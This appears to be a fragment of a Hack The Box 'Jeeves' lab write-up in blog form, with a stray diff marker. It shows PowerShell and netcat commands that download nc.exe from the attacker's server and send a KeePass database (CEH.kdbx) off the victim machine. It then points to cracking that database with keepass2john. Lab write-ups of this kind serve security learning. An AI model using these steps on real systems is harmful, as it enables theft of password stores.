MaangoTaachyon/archive.github.io/_posts/2021-12-18-Jeeves-HackTheBox.md

 After a little bit of recon we come accross CEH.kdbx

 This file format appears to be a keepass password file.
 Before we attempt to see the password we have to download the file to our local machine.

 ![](/assets/images/Jeeves/jeeveskdbx.PNG)

  I achieved this by downloading a netcat executable from the user shell we are in from a python http server that we host.

 "powershell wget "http://localip:8000/nc.exe" -outfile nc.exe"
 The virtual machine cannot reach out to github to download the file from there Then "nc -lnvp <port> > CEH.kdbx" on your local machine and "nc.exe <local-ip> <same-port> < "CEH.kdbx" on the victim machine

 We need a password to open the kdbx file.
 Why dont we crack it?
-I used this article as guidance, the main points summarized are:
+I used this article as guidance, the main points summarized are

 https://www.rubydevices.com.au/blog/how-to-hack-keepass
 download and use keepass2john on the kdbx file.